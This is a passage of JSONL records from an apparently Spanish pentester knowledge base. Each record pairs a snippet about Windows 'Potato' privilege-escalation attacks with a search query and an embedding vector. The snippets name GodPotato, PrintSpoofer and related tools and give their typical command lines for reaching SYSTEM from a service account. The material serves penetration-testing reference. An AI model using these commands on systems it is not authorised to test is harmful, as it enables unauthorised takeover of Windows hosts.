Privesc/Potato attacks.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "# Potato attacks\n\n> Cuando `whoami /priv` muestra **SeImpersonatePrivilege** o **SeAssignPrimaryTokenPrivilege** β†’ abuso de token a **NT AUTHORITY\\SYSTEM**.", "indexar": "cual es una herramienta para revisar los derechos de privilegio de un usuario actual", "v": [-0.04003, 0.03764, -0.10941, -0.17717, 0.13008, -0.11738, -0.07332, -0.07301, -0.07343, -0.11486, 0.03154, -0.12746, -0.03452, -0.06455, 0.018, -0.05994, 0.15599, 0.00828, 0.0276, 0.01222, 0.05096, -0.0798, -0.10092, 0.00114, -0.09637, -0.09159, 0.07146, -0.02325, -0.08172, 0.13998, 0.08006, -0.01606, 0.03623, -0.08411, -0.0329, 0.0164, 0.14703, 0.17761, 0.00048, 0.1032, 0.09212, 0.03639, -0.08418, 0.08944, -0.00947, -0.02906, -0.07335, 0.06324, -0.00873, 0.0448, 0.07268, -0.06423, -0.18022, -0.05028, 0.01924, -0.10699, 0.15204, -0.08407, 0.04305, -0.06146, -0.11257, -0.02277, 0.04999, 0.01483, -0.06771, -0.04596, -0.02303, -0.05153, -0.09063, 0.10088, 0.00321, -0.04513, -0.02419, -0.04903, -0.03705, -0.08438, -0.01349, -0.05233, 0.03882, -0.02239, -0.02885, 0.02007, -0.08038, 0.05284, -0.11867, -0.08045, 0.05779, -0.037, -0.03395, -0.04172, 0.03096, 0.07433, 0.00883, -0.06761, 0.01029, -0.02969, 0.07266, -0.04945, -0.01069, -0.06112, 0.17973, -0.02721, -0.02677, 0.09878, 0.08329, -0.00082, -0.04983, -0.06159, -0.08318, -0.0178, 0.00259, 0.06134, -0.0313, 0.05419, 0.01989, 0.10626, -0.10143, -0.10352, -0.01564, -0.13037, 0.03151, -0.06206, -0.06417, -0.11444, 0.0852, -0.01877, 0.03013, 0.12494, -0.03994, -0.05684, -0.06046, -0.08242, -0.0159, 0.03221, -0.01331, -0.05885, -0.0299, -0.08976, -0.01153, -0.00033, 0.05465, 0.03216, -0.05224, -0.06192, 0.05399, -0.02528, -0.01101, 0.03258, -0.12513, -0.073, 0.00964, -0.04472, 0.04559, 0.00581, -0.00866, 0.0191, -0.13769, -0.02649, -0.07391, 0.00261, -0.02202, -0.09228, 0.01609, -0.01979, 0.03779, -0.09254, 0.0417, -0.04449, 0.0607, -0.05087, 0.04171, -0.01455, 0.03992, 0.01368, -0.03169, -0.06688, -0.03188, 0.03382, 0.04621, -0.05942, -0.04145, 0.01378, -0.02947, -0.04153, 0.00269, -0.05382, -0.03007, 0.03464, 0.02481, 0.07227, 0.02196, 0.07389, 0.04628, -0.05744, 0.06538, 0.00641, -0.05819, 0.01094, -0.03302, -0.05703, -0.06486, -0.02729, -0.02367, -0.00654, -0.01393, -0.00924, 0.03181, -0.04655, -0.05379, 0.01449, -0.01207, 0.00153, 0.01281, 0.02197, -0.03952, -0.03518, 0.0298, -0.00273, -0.03192, -0.05578, 0.00697, -0.03296, 0.03705, 0.01524, -0.00825, 0.01595, 0.02899, 0.0027, -0.02444, -0.06267, 0.05342, 0.00549, -0.0064, -0.0302, 0.03475, 0.02224, 0.0633, -0.01133, -0.03833, -0.04607, 0.00449, 0.09177, 0.00093, 0.00108, 0.02881, -0.01762, -0.06054, -0.0607, -0.0408, -0.09701, 0.01339, -0.01284, 0.09146, -0.09885, 0.02488, -0.01607]} -{"tipo": "pregunta", "herramienta": "Potato attacks", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/Potato attacks.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "## El gatillo\n```\nwhoami /priv β†’ busca SeImpersonatePrivilege = Enabled\n```\nTΓ­pico en cuentas de servicio (IIS, MSSQL `sa`, etc.).", "indexar": "ΒΏquΓ© programa permite ver si la impersonaciΓ³n privada estΓ‘ habilitada?", "v": [-0.24387, 0.08256, 0.03578, -0.1711, 0.11231, -0.07945, 0.08085, -0.16747, -0.18165, -0.10639, 0.00584, -0.05458, 0.03476, -0.0283, -0.00314, 0.02642, 0.01113, -0.08746, 0.11885, 0.06593, -0.0201, 0.06616, -0.01012, -0.05712, -0.07425, -0.0646, 0.18884, -0.01477, -0.08944, -0.14725, -0.01867, -0.04942, -0.00325, -0.03929, 0.12635, 0.10245, -0.00545, 0.01726, 0.0682, -0.03592, 0.0769, 0.05447, 0.06909, -0.04555, 0.14824, 0.02959, 0.00411, -0.00451, -0.05756, 0.08027, -0.13117, 0.03413, 0.02769, -0.09507, 0.09738, -0.04013, 0.01338, -0.00021, -0.06018, 0.10217, 0.0412, -0.04297, 0.03315, 0.08039, 0.01651, -0.07337, 0.14505, 0.05318, -0.03585, 0.04159, 0.03023, -0.07697, 0.05102, 0.14508, -0.05402, -0.03688, -0.14692, -0.01278, 0.02915, 0.00687, -0.05537, -0.01663, 0.02531, 0.0464, 0.01648, 0.04719, 0.06792, 0.04069, 0.01387, -0.02722, 0.01807, 0.1199, 0.08163, 0.03492, -0.0057, -0.02563, 0.09455, 0.07491, -0.06911, -0.0365, 0.08974, -0.02476, -0.08614, 0.10437, -0.07188, 0.04562, 0.08261, -0.01701, -0.11203, 0.04425, 0.03016, 0.08254, -0.08162, 0.04427, -0.05183, 0.07141, 0.02613, -0.055, 0.02307, -0.00112, -0.07698, 0.02332, -0.05991, -0.08385, 0.08925, -0.02787, -0.12164, 0.13711, -0.05945, 0.06288, -0.03612, -0.04892, 0.02293, -0.11831, -0.06024, -0.05635, -0.03982, -0.05239, 0.08671, -0.00655, 0.01355, 0.00043, 0.05318, 0.0151, 0.01688, -0.0191, -0.02971, -0.12316, 0.02284, 0.02541, -0.0017, 0.05379, 0.00981, 0.06521, -0.0576, 0.02266, 0.00711, -0.02798, -0.04744, 0.06496, -0.01841, -0.04606, -0.11956, -0.08303, 0.05261, 0.02637, 0.02011, -0.04584, 0.0076, 0.09596, 0.00432, 0.02042, -0.01176, -0.00327, 0.043, 0.0147, 0.0334, -0.04843, 0.02236, -0.02422, -0.04436, -0.00727, 0.1056, -0.03309, 0.04999, -0.0636, -0.05395, -0.01366, 0.0123, -0.02365, -0.03409, -0.01341, -0.00404, -0.01651, 0.00083, 0.03449, -0.0899, -0.00629, 0.01924, -0.01152, 0.02229, -0.02089, 0.0097, 0.02656, -0.01416, 0.04997, -0.00659, -0.03172, 0.00285, 0.07075, -0.03018, 0.02315, 0.03922, -0.00235, -0.04595, 0.05407, -0.06085, 0.0453, 0.03549, -0.03114, 0.00991, -0.02488, 0.05398, 0.04843, 0.04813, -0.03621, 0.01896, 0.02148, 0.00232, 0.05583, 0.02161, -0.05267, -0.00278, -0.01216, 0.03542, -0.04014, -0.01333, 0.01833, 0.00494, -0.09056, 0.01844, 0.08875, -0.00513, -0.03742, -0.00333, 0.03029, 0.00893, 0.00575, -0.00077, -0.01424, -0.03397, 0.01147, 0.00554, -0.08207, 0.06111, 0.05254]} -{"tipo": "pregunta", "herramienta": "Potato attacks", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/Potato attacks.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "## El gatillo\n```\nwhoami /priv β†’ busca SeImpersonatePrivilege = Enabled\n```\nTΓ­pico en cuentas de servicio (IIS, MSSQL `sa`, etc.).", "indexar": "ΒΏcon quΓ© puedo verificar si el privilegio SeImpersonatePrivilege estΓ‘ activo en un servicio?", "v": [-0.20433, 0.19518, -0.14302, 0.00541, 0.14567, -0.11746, 0.05881, -0.16607, -0.18264, -0.17332, -0.0332, -0.06571, 0.01128, -0.05447, 0.15582, 0.08218, 0.08439, -0.16121, 0.0515, 0.08049, 0.111, -0.05224, -0.01216, -0.03595, 0.01332, 0.06732, 0.08489, 0.01938, -0.06047, 0.0352, 0.04849, 0.0028, 0.04136, -0.11715, 0.09023, -0.01832, 0.01035, 0.1115, 0.09652, 0.06322, 0.12813, -0.06294, 0.01031, -0.04603, 0.04924, 0.00413, -0.07095, 0.00453, -0.04985, 0.0053, -0.0529, 0.00311, 0.00085, -0.09907, -0.06106, 0.08772, -0.06876, 0.04826, 0.00508, -0.06315, 0.00676, -0.03136, 0.06092, 0.02916, 0.04579, -0.03729, 0.07557, 0.01979, 0.01802, -0.0742, -0.07274, -0.05659, -0.03938, -0.01759, -0.09272, 0.00617, 0.03989, -0.08752, 0.03418, 0.03441, 0.05068, 0.08729, -0.06253, 0.05789, -0.08358, -0.00746, 0.02149, -0.07114, -0.01516, -0.03136, 0.10666, 0.14969, 0.03005, 0.05623, -0.06621, 0.095, -0.04493, 0.08203, 0.06263, 0.0551, 0.12561, 0.00751, -0.03006, 0.12643, 0.02735, 0.02311, -0.01394, -0.08215, -0.10148, -0.05529, -0.04812, -0.07353, -0.03719, -0.05625, -0.02561, 0.09801, -0.07093, -0.10867, 0.06248, 0.03904, -0.05213, -0.03605, 0.01049, -0.01783, 0.06108, -0.03886, -0.00936, 0.04097, 0.0122, 0.07204, 0.00838, 0.01821, -0.02252, -0.0823, 0.02819, 0.00689, -0.02567, -0.03042, 0.03199, -0.04731, 0.08403, -0.02326, 0.00922, -0.0157, 0.08852, 0.01223, -0.0045, -0.05584, -0.11837, 0.00126, -0.01981, -0.04332, 0.03752, 0.12606, 0.01293, -0.00155, -0.01229, -0.06164, 0.03749, 0.05125, 0.01756, -0.04973, -0.00484, 0.00315, 0.04631, 0.00609, -0.02209, -0.1012, 0.02247, -0.04179, -0.04152, -0.01944, -0.0439, -0.10075, -0.0309, -0.02913, -0.02645, 0.03358, 0.07553, -0.02353, -0.08346, -0.02615, 0.00826, -0.06553, -0.05799, 0.00173, -0.00353, -0.0176, 0.01396, 0.02226, 0.0328, 0.07221, 0.00243, 0.0259, -0.00952, -0.01479, -0.04271, 0.00787, -0.01871, -0.01434, -0.01611, 0.00858, -0.05011, -0.03027, -0.07449, -0.00735, -1e-05, 0.02607, -0.06055, 0.05225, -0.03305, 0.00587, 0.13189, -0.0685, -0.02067, 0.02931, 0.05879, -0.04402, -0.04432, -0.01534, 0.03031, 0.01083, 0.03236, -0.01682, 0.06896, 0.01848, 0.0413, 0.04409, 0.08735, 0.0541, 0.0006, 0.03618, 0.00414, -0.0674, 0.06377, 0.06468, 0.05997, -0.01477, -0.01327, -0.0495, 0.07961, 0.07931, -0.01943, -0.05092, -0.00399, -0.05854, -0.06024, 0.00424, -0.01335, -0.05879, 0.03375, 0.00439, 0.03229, -0.03443, 0.06918, -0.04045]} -{"tipo": "pregunta", "herramienta": "Potato attacks", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/Potato attacks.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "## La familia\n```\nJuicyPotato β†’ Windows antiguos\nPrintSpoofer β†’ Windows 10/Server 2016-2019 (servicio de impresiΓ³n)\nGodPotato β†’ moderno, muy fiable hoy\nRoguePotato / RottenPotato β†’ variantes\n```", "indexar": "que herramienta sirve para interceptar la impresora de Windows", "v": [0.14807, -0.02239, -0.15235, -0.26662, 0.1654, -0.13297, -0.05976, -0.04039, 0.00569, -0.02875, 0.00638, -0.04895, 0.04782, -0.09364, -0.01761, 0.07932, -0.05564, -0.05691, -0.00818, -0.0189, 0.00147, 0.0937, -0.0657, -0.0759, -0.10416, 0.02916, -0.09568, 0.04015, -0.20712, -0.00395, -0.0519, -0.02831, 0.06365, -0.04296, -0.16653, -0.11396, -0.1174, 0.08241, 0.06034, 0.10697, 0.10667, 0.14637, -0.11381, 0.0128, 0.10022, 0.00701, 0.04914, 0.0473, 0.04279, 0.09581, -0.08815, -0.1431, -0.0549, 0.01621, -0.07299, -0.11438, 0.13675, -0.00513, -0.0179, -0.01216, -0.1095, 0.0261, -0.09654, -0.05181, -0.05803, -0.00714, -0.06609, -0.1085, -0.02888, 0.01409, -0.04457, 0.04225, 0.11763, -0.00529, 0.06727, 0.00767, -0.12237, 0.05702, 0.09731, -0.0172, -0.00912, 0.00272, -0.02335, -0.0796, 0.01738, -0.10974, 0.04671, -0.02986, -0.02157, -0.10877, -0.04616, 0.0347, -0.0485, 0.01782, 0.07059, -0.03454, 0.00151, -0.02228, 0.0098, 0.04824, 0.1106, -0.06872, -0.09782, 0.03538, -0.00263, -0.0348, -0.07309, 0.00279, -0.0734, -0.04398, 0.01858, 0.06075, -0.0393, 0.05833, -0.07543, -0.01475, 0.06136, -0.05521, -0.01111, -0.02122, -0.02276, 0.05983, -0.09149, -0.05343, 0.04302, -0.05914, -0.0624, 0.09344, -0.07664, -0.07507, -0.04541, -0.05144, -0.03505, 0.01605, -0.02168, -0.00977, -0.01846, -0.14926, -0.00559, -0.07523, 0.0745, 0.04127, 0.02961, -0.04072, -0.01194, 0.00021, 0.10607, 0.06214, -0.0841, -0.03771, -0.00149, -0.09576, -0.02774, -0.01377, -0.02871, 0.01276, 0.02085, 0.03637, -0.02433, -0.00096, -0.07503, -0.04345, 0.01651, 0.0051, 0.05334, -0.0735, -0.03536, 0.02668, 0.08755, 0.01827, -0.0435, -0.0195, 0.05021, -0.06705, 0.01386, 0.02066, 0.01046, 0.04378, 0.01186, -0.08652, -0.06721, 0.10167, 0.00349, -0.01367, 0.00524, 0.01514, -0.01857, 0.02466, 0.00341, 0.00594, -0.01012, 0.00697, 0.0069, -0.10085, 0.00783, 0.00859, 0.02198, -0.00294, 0.0828, -0.01966, 0.02127, -0.00125, -0.05219, -0.03351, 0.05353, 0.02508, -0.04873, -0.0118, 0.02376, 0.02385, -0.02523, 0.08612, -0.02915, -0.04654, 0.00737, -0.04195, 0.00668, 0.0108, 0.05405, 0.00341, 0.06927, -0.03097, 0.03126, -0.00173, -0.00091, -0.01302, -0.0388, -0.01577, 0.05492, -0.01709, 0.04026, 0.04953, -0.02272, 0.03021, -0.02197, -0.03456, 0.0144, -0.01613, -0.02215, -0.06411, -0.02511, 0.02677, -0.04323, -0.03799, -0.04384, -0.01641, 0.03422, -0.04104, 0.00576, -0.11479, 0.01966, 0.01552, 0.05345, 0.01394, 0.00633, 0.00421]} -{"tipo": "pregunta", "herramienta": "Potato attacks", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/Potato attacks.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "## La familia\n```\nJuicyPotato β†’ Windows antiguos\nPrintSpoofer β†’ Windows 10/Server 2016-2019 (servicio de impresiΓ³n)\nGodPotato β†’ moderno, muy fiable hoy\nRoguePotato / RottenPotato β†’ variantes\n```", "indexar": "cual es una alternativa moderna a PrintSpoofer", "v": [-0.10184, -0.02972, -0.0663, -0.03343, -0.04644, -0.02165, 0.00889, -0.16564, -0.30641, -0.05623, -0.0407, -0.06949, 0.1135, -0.00158, 0.0101, -0.07138, 0.02437, -0.06983, 0.06412, 0.04374, -0.06496, -0.0123, -0.12026, -0.14378, 0.08078, -0.09111, 0.0026, 0.01781, -0.07949, -0.01518, 0.03881, 0.05633, 0.0553, -0.0125, -0.11845, 0.08177, 0.05618, 0.08665, 0.05279, -0.01169, 0.0384, -0.00643, -0.00014, 0.113, 0.07777, -0.07485, -0.10544, 0.08491, -0.13574, 0.06907, -0.10033, 0.05369, 0.01207, 0.10225, 0.04781, -0.08468, 0.02557, -0.01736, -0.06045, -0.0421, -0.02576, 0.05642, -0.08424, -0.03768, 0.07191, -0.03986, -0.12779, -0.04779, -0.09007, -0.05066, -0.02709, -0.02189, 0.07798, -0.04647, -0.13057, 0.09434, -0.1065, 0.00977, 0.01087, 0.03779, -0.01306, -0.06586, 0.0415, -0.00697, -0.00023, -0.0832, -0.02059, -0.01346, -0.05163, 0.07725, 0.03015, -0.01012, 0.10037, 0.0481, -0.01296, -0.08285, 0.02054, -0.0354, -0.00246, 0.00853, -0.02666, 0.03493, -0.05069, -0.06781, 0.01272, -0.13039, -0.05665, 0.06432, -0.07312, -0.0555, -0.06657, 0.07348, 0.11071, 0.0475, 0.11194, 0.01874, -0.0379, 0.02605, 0.03285, 0.01363, -0.07311, -0.02475, -0.06005, -0.10703, 0.01794, -0.03058, 0.05562, 0.00794, -0.08561, 0.06008, 0.01644, -0.07719, 0.0377, -0.16518, -0.03738, 0.03577, 0.05516, -0.07305, 0.0947, -0.07287, 0.00587, 0.04365, 0.00442, -0.09253, -0.0066, -0.05801, 0.05605, 0.02894, -0.03699, -0.05329, -0.10405, 0.05428, -0.07173, 0.13529, -0.02389, 0.00232, -0.04571, -0.04461, -0.04007, 0.09263, 0.01603, -0.11051, 0.01765, 0.04148, -0.04054, -0.08272, -0.01397, 0.03554, -0.08634, 0.03075, 0.04572, -0.00789, 0.02512, 0.00677, 0.03136, 0.0127, 0.0208, 0.0013, 0.05323, -8e-05, -0.04178, 0.05775, -0.13387, -0.01437, 0.0172, -0.03719, 0.04515, 0.07059, 0.00128, -0.10485, -0.0073, 0.03351, -0.03432, -0.05718, 0.00911, 0.03826, 0.04736, -0.06781, -0.0486, -0.02465, 0.00614, -0.02781, -0.04412, -0.06532, -0.04323, 0.04944, -0.03161, 0.01956, -0.00323, -0.01497, 0.04891, -0.00344, 0.01267, -0.0246, -0.05955, -0.02179, -0.01405, -0.06532, 0.0067, 0.00307, 0.01033, -0.10546, -0.01882, -0.04299, -0.0238, 0.01779, -0.01821, 0.03102, 0.01244, -0.03302, -0.00013, 0.03212, -0.00778, 0.09214, 0.00426, 0.06929, 0.00747, -0.05442, -0.08546, -0.04458, 0.06669, 0.05658, -0.02875, 0.06697, -0.00924, 0.00824, -0.07315, -0.01925, -0.0373, -0.05114, -0.04341, 0.02124, -0.03891, 0.02043, 0.13954, -0.0084]} -{"tipo": "pregunta", "herramienta": "Potato attacks", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/Potato attacks.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "## La familia\n```\nJuicyPotato β†’ Windows antiguos\nPrintSpoofer β†’ Windows 10/Server 2016-2019 (servicio de impresiΓ³n)\nGodPotato β†’ moderno, muy fiable hoy\nRoguePotato / RottenPotato β†’ variantes\n```", "indexar": "como puedo usar un programa similar al GodPotato hoy en dia", "v": [-0.23496, 0.09673, -0.03808, 0.05202, 0.02258, -0.08302, 0.06987, -0.11214, -0.09813, -0.05992, -0.1137, -0.05743, -0.0479, 0.05455, -0.1384, -0.01733, 0.13919, -0.07932, -0.01276, 0.00366, -0.0119, -0.05088, -0.045, -0.13188, 0.09502, 0.07967, 0.10481, 0.02638, -0.04026, 0.01357, -0.03043, -0.03312, -0.02911, -0.16808, -0.12112, -0.07875, 0.03062, 0.02852, 0.01523, 0.05824, -0.0253, -0.01607, -0.03637, 0.10003, 0.10273, 0.01023, 0.08381, -0.05675, -0.12173, -0.0401, -0.01354, -0.0048, -0.03565, 0.0346, 0.12096, 0.00078, -0.05123, -0.13552, -0.12259, 0.03253, -0.03055, 0.03097, 0.06856, -0.06503, 0.01309, -0.02925, -0.04144, 0.08903, -0.12994, 0.00697, -0.03021, 0.04292, -0.01107, -0.00917, -0.04988, 0.07782, -0.01562, -0.00072, -0.01667, -0.07398, -0.11303, 0.03009, 0.08618, 0.01919, -0.1183, -0.01095, 0.14518, -0.0195, -0.0049, -0.08539, 0.08647, 0.12382, 0.04942, 0.06228, 0.11947, -0.01805, 0.05068, 0.012, -0.02374, 0.00273, 0.1291, -0.09614, -0.0019, 0.06262, -0.04003, 0.03293, 0.11621, -0.01046, -0.08678, -0.0627, -0.01135, -0.06675, -0.10815, -0.11142, -0.0324, 0.0226, 0.05368, -0.05627, -0.01007, -0.08534, -0.04349, -0.00973, -0.01659, 0.02916, 0.17137, -0.05798, 0.02093, 0.09335, -0.06969, 0.08509, -0.03259, 0.06199, 0.00971, -0.08472, -0.06756, 0.01328, 0.01596, -0.02257, 0.03804, 0.01412, 0.04167, 0.12445, -0.02132, -0.03552, 0.04794, -0.02274, -0.01209, -0.07969, -0.00928, -0.08248, 0.04513, 0.05336, -0.00816, 0.05574, -0.03594, -0.02902, 0.03201, 0.0079, -0.0578, 0.05858, -0.08981, 0.00207, -0.06519, -0.03676, 0.06626, -0.06445, -0.00247, -0.00655, 0.01706, 0.05983, 0.00739, 0.10054, 0.06725, -0.07912, -0.00127, -0.05226, -0.00789, -0.00092, -0.05788, -0.00304, -0.0615, 0.06655, 0.02399, 0.01454, -0.04569, -0.04303, -0.01158, 0.06129, -0.00022, -0.01343, -0.00774, 0.06492, 0.04698, -0.06476, -0.02365, 0.0246, 0.04359, 0.04236, 0.02058, 0.0279, -0.05956, -0.03202, -0.06775, -0.09834, 0.06847, 0.06678, -0.02732, 0.03191, 0.08023, 0.13646, -0.02401, -0.05656, 0.06152, -0.02451, -0.03729, -0.06772, -0.01578, 0.04859, 0.05107, 0.0402, 0.03188, 0.02074, 0.0639, 0.04304, 0.00896, -0.04553, -0.00263, 0.00819, 0.01456, 0.03939, -0.04985, -0.02256, -0.03158, -0.07075, -0.01166, -0.01446, -0.00311, -0.03725, -0.02779, -0.07518, -0.03126, 0.08975, 0.03897, 0.00401, -0.03449, 0.01579, -0.07424, -0.01371, -0.00907, 0.03052, -0.015, 0.01072, 0.0493, -0.03875, 0.03565, 0.01859]} -{"tipo": "pregunta", "herramienta": "Potato attacks", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/Potato attacks.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "## Uso tΓ­pico (GodPotato/PrintSpoofer)\n```\nGodPotato.exe -cmd \"cmd /c whoami\"\nPrintSpoofer.exe -i -c cmd\n```\nSubes el .exe con Transferencia de ficheros.", "indexar": "quΓ© programa puedo usar para obtener mis datos del sistema desde otra PC?", "v": [-0.1034, 0.13527, -0.03446, -0.176, 0.04692, -0.14147, 0.06977, -0.13399, -0.18984, -0.04947, -0.12382, -0.02455, -0.09845, -0.09924, -0.03309, -0.07856, 0.04305, -0.03425, 0.09378, -0.07188, -0.05017, -0.13154, -0.05496, -0.08801, -0.09776, 0.16047, 0.03728, -0.06937, -0.11976, 0.01347, 0.0224, -0.0074, 0.03688, -0.08231, -0.02952, 0.02959, 0.07527, 0.05838, 0.09057, -0.02039, 0.03125, 0.01212, 0.00557, 0.0254, 0.1613, -0.04652, 0.02173, -0.00262, -0.02356, -0.12464, -0.07791, 0.01429, -0.11617, -0.05186, 0.05108, -0.16619, -0.00615, -0.08438, 0.03946, -0.00881, -0.01462, 0.12346, -0.00686, -0.01746, 0.00417, 0.01434, 0.03796, 0.00617, -0.1089, 0.10559, 0.00046, 0.06657, 0.07335, -0.02749, 0.07125, 0.00873, 0.01241, -0.02712, 0.09763, -0.05108, -0.05895, 0.03252, -0.06638, 0.05284, -0.0153, 0.00704, 0.16247, -0.0619, -0.02471, -0.08129, 0.09002, 0.02085, -0.02862, 0.08454, 0.13828, -0.01926, 0.04784, 0.00902, -0.02021, 0.03458, 0.04901, -0.02666, -0.08334, 0.13115, -0.07986, 0.04371, 0.07614, -0.02848, -0.0402, -0.01699, -0.08888, -0.03421, -0.08637, -0.03211, -0.08942, 0.01446, 0.00814, -0.05638, -0.02014, -0.03276, -0.06057, 0.02487, 0.00993, -0.00773, 0.09199, -0.02865, 0.00175, 0.11556, -0.04876, 0.06824, 0.0257, -0.03105, -0.05807, -0.0458, 0.00836, -0.03099, -0.02679, -0.03697, 0.01846, -0.0417, 0.02511, 0.10292, -0.03593, 0.02427, 0.05319, -0.04164, 0.02871, -0.05279, -0.04139, -0.06706, 0.03537, 0.03973, -0.00155, 0.022, -0.06755, 0.00038, 0.0595, -0.05681, -0.05495, -0.02334, -0.09952, 0.00055, -0.03515, 0.00103, 0.06465, -0.07957, 0.01925, -0.03916, 0.07383, 0.09458, -0.00545, 0.08754, 0.09878, -0.1189, 0.07022, -0.01635, -0.03055, -0.09895, -0.04066, 0.00719, -0.0945, 0.07501, 0.03156, -0.01435, -0.00578, 0.01265, -0.01585, 0.031, -0.006, -0.00926, 0.00918, 0.06124, 0.05796, -0.04237, 0.00785, -0.02526, -0.02829, -0.0156, 0.07521, -0.02824, -0.07472, 0.07378, -0.0017, -0.03037, 0.0434, 0.10191, 0.00468, -0.03002, 0.09225, 0.07868, 0.0251, -0.04953, 0.09164, 0.0119, -0.05415, 0.00926, -9e-05, 0.06041, 0.0286, -0.01893, 0.00253, 0.02167, 0.01804, 0.05802, -0.02344, -0.06823, -0.0111, 0.04522, -0.00094, 0.00052, -0.01052, -0.05837, 0.02314, -0.02517, 0.02114, -0.03595, -0.02616, -0.04778, -0.02802, -0.07748, 0.00726, 0.11229, -0.0067, -0.06957, -0.00765, -0.01957, -0.08542, 0.02308, -0.01154, -0.06149, -0.02704, -0.00059, 0.01846, -0.08212, -0.02991, 0.01859]} -{"tipo": "pregunta", "herramienta": "Potato attacks", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/Potato attacks.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "## Uso tΓ­pico (GodPotato/PrintSpoofer)\n```\nGodPotato.exe -cmd \"cmd /c whoami\"\nPrintSpoofer.exe -i -c cmd\n```\nSubes el .exe con Transferencia de ficheros.", "indexar": "con quΓ© herramienta puedo ejecutar comandos de la lΓ­nea de comandos remotamente sin instalar nada?", "v": [0.12381, 0.12219, -0.1369, -0.13365, 0.08764, -0.08523, 0.02131, 0.01119, -0.13273, -0.00965, -0.15379, -0.02581, 0.09648, -0.08671, 0.08651, 0.11428, 0.13552, -0.01283, -0.03374, -0.09226, 0.03197, -0.11073, 0.00369, -0.02138, -0.03186, 0.02453, 0.12118, -0.01537, -0.14226, -0.11897, -0.02927, 0.03763, 0.09472, -0.03913, -0.08454, 0.036, -0.08415, 0.01253, -0.0036, 0.15117, -0.05088, 0.0808, -0.13359, 0.03364, 0.02179, -0.09262, 0.05897, -0.01222, 0.09124, -0.07483, -0.0041, -0.09261, -0.06795, -0.05015, -0.06618, -0.09127, 0.27166, -0.09886, 0.05413, -0.00765, -0.08066, -0.06961, 0.00807, 0.09131, 0.0224, -0.01546, -0.05402, -0.14964, -0.08671, 0.09245, -0.09134, 0.04067, -0.06226, 0.05624, 0.05795, -0.0111, -0.05403, -0.02374, 0.12943, -0.02455, 0.00958, -0.00744, -0.07641, -0.00291, -0.06516, -0.14966, -0.07792, -0.01891, -0.01791, -0.07327, 0.02891, 0.00753, -0.00558, 0.01691, 0.07041, 0.00673, 0.04083, -0.0246, 0.04118, -0.0257, 0.03307, -0.02484, -0.07602, 0.16268, 0.01029, 0.00795, 0.03858, -0.04272, 0.02913, -0.00888, 0.03999, -0.06953, 0.03496, -0.03728, -0.04235, -0.03926, -0.03035, -0.07344, -0.01489, -0.03332, -0.08741, 0.03633, -0.00238, 0.04769, 0.03226, -0.05315, -0.05377, 0.0644, 0.05606, -0.01126, -0.02659, -0.05051, 0.09435, -0.08562, -0.05543, 0.10004, -0.01705, -0.07687, -0.09141, -0.18682, 0.05155, 0.04965, -0.02736, -0.0054, 0.0602, -0.00433, -0.00115, -0.07917, -0.05191, -0.02169, 0.11707, 0.02677, -0.07215, 0.06652, -0.04417, -0.03357, -0.00992, 0.01953, -0.03221, 0.03063, -0.03932, -0.04591, -0.01493, -0.02286, 0.01556, -0.06001, -0.03758, -0.00747, 0.00904, 0.0524, -0.01656, 0.05391, 0.02798, -0.03814, 0.01484, -0.08528, -0.01424, 0.00803, 0.04451, -0.02888, -0.05851, 0.05973, -0.03995, -0.05373, 0.00325, -0.04217, -0.03079, -0.02346, -0.01014, 0.02321, 0.02108, 0.05628, -0.04782, -0.04509, 0.02763, 0.00338, 0.01768, -0.02909, -0.05008, -0.0434, -0.08783, 0.01623, 0.02043, -0.06718, 0.07306, 0.02836, -0.01962, 0.06773, -0.01484, 0.06498, 0.05079, -0.03878, 0.03484, -0.02446, -0.02394, -0.05324, 0.01524, -0.02678, -0.03032, 0.00306, 0.02148, 0.01268, 0.06311, -0.01901, 0.01448, 0.0295, -0.01611, 0.00273, 0.03005, 0.00418, 0.00505, -0.01893, -0.02857, -0.04651, 0.04037, -0.02052, 0.01785, -0.0009, -0.02319, -0.0076, -0.01776, 0.08219, 0.01713, -0.08925, -0.02851, -0.0779, -0.07027, -0.00157, -0.04774, -0.05712, -0.02746, 0.01184, 0.0406, -0.0558, -0.03192, -0.01848]} -{"tipo": "pregunta", "herramienta": "Potato attacks", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/Potato attacks.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "## Uso tΓ­pico (GodPotato/PrintSpoofer)\n```\nGodPotato.exe -cmd \"cmd /c whoami\"\nPrintSpoofer.exe -i -c cmd\n```\nSubes el .exe con Transferencia de ficheros.", "indexar": "que software sirve para acceder a informaciΓ³n del equipo remoto mediante transferencia de archivos?", "v": [0.02094, 0.03245, -0.18633, -0.30025, 0.08226, -0.12314, 0.01999, -0.07436, -0.09201, -0.08437, -0.16145, -0.12859, 0.05309, -0.05887, 0.10826, 0.04083, 0.15095, -0.00945, 0.0897, 0.02035, 0.07932, 0.02279, 0.03334, -0.06316, -0.05415, 0.01892, 0.04195, 0.0279, -0.13859, -0.03453, 0.09349, -0.02712, 0.0453, -0.03776, -0.01259, -0.03925, 0.03491, 0.15688, -0.03848, 0.0427, 0.06987, -0.04858, -0.08554, 0.00945, 0.10306, -0.06846, 0.0867, 0.07112, 0.09457, 0.01232, -0.02594, -0.04623, -0.09877, -0.06465, -0.10153, -0.04175, 0.14375, -0.11974, 0.0171, -0.05066, -0.06519, -0.00341, -0.06385, 0.00359, 0.00043, -0.00732, -0.04264, -0.06658, -0.19216, 0.01327, -0.00305, 0.01755, 0.07457, -0.04175, -0.10174, -0.0602, -0.03335, 0.06769, 0.0084, -0.08415, 0.02208, 0.04068, -0.07731, -0.0217, -0.07679, -0.10267, 0.14243, 0.04204, 0.08762, -0.08097, 0.07308, 0.007, -0.05715, 0.03104, 0.06186, -0.00062, 0.01411, 